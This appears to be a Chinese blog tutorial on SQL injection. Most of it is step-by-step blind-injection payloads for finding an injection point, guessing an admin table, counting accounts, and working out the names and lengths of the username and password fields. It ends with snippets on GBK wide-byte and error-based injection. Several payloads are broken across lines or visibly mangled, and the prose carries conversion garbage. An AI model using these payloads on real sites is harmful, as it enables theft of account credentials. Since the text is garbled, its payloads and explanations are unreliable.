SQL注入

2021-06-25 12:13:43 字數 1710 閱讀 1204

所謂sql注入,就是通過把sql命令插入到web表單遞交或輸入網域名稱或頁面請求的查詢字串,最終達到欺騙伺服器執行惡意的sql命令,比如先前的很多影視**洩露vip會員密碼大多就是通過web表單遞交查詢字元暴出的,這類表單特別容易受到sql注入式攻擊。

sql注入語句是學習sql語句過程中需要掌握的知識,下面就為您介紹5個標準的sql注入語句,希望對您了解sql注入語句有所幫助。

1.判斷有無注入點

; and 11

=1 and 1=

2

2.猜表,一般的表的名稱無非是admin adminuser user pass password 等..

and 0

<

>

(select count(*) from *)

and 0

<

>

(select count(*) from admin) ---判斷是否存在admin這張表

3.猜帳號數目 如果遇到0< 返回正確頁面 1《返回錯誤頁面說明帳號數目就是1個

and 0

<

(select count(*) from admin)

and 1

<

(select count(*) from admin)

4.猜解欄位名稱 在len( ) 括號裡面加上我們想到的欄位名稱.

and 

1=(select count(*) from admin where len(*)

>

0)--

and

1=(select count(*) from admin where len(使用者欄位名稱name)

>

0)

and

1=(select count(*) from admin where len(_blank

>

密碼欄位名稱password)

>

0)

5.猜解各個欄位的長度 猜解長度就是把》0變換 直到返回正確頁面為止

and 

1=(select count(*) from admin where len(*)

>

0)

and

1=(select count(*) from admin where len(name)

>

6) 錯誤

and

1=(select count(*) from admin where len(name)

>

5) 正確 長度是6

and

1=(select count(*) from admin where len(name)=6) 正確

and

1=(select count(*) from admin where len(password)

>

11) 正確

and

1=(select count(*) from admin where len(password)

>

12) 錯誤 長度是12

and

1=(select count(*) from admin where len(password)=12) 正確

SQL注入(三) sql注入 bugku

原理 mysql 在使用 gbk 編碼的時候,會認為兩個字元為乙個漢字,例如 aa 5c 就是乙個 漢字 前乙個 ascii碼大於 128 才能到漢字的範圍 我們在過濾 的時候,往往利用的思 路是將 轉換為 換的函式或者思路會在每一關遇到的時候介紹 因此我們在此想辦法將 前面新增的 除掉,一般有兩種...

SQL注入 報錯注入

乙個帶get引數的 並且不從資料庫返回資料,但存在報錯資訊 檢視字段情況 報錯注入語句格式 and 1 2 union select1,2,3 from select count concat floor rand 0 2 sql語句 a from information schema.tables...

SQL注入 報錯注入

sql注入基礎 盲注 用於注入結果無回顯但錯誤資訊有輸出的情況 floor函式 返回小於等於某值的整數,例如floor 1 則返回1,floor 1.9 也返回1 rand函式 生成隨機數.可指定seed,指定後每次生成的數都一樣即偽隨機,不指定seed則每次生成的隨機數都不一樣.通過floor和r...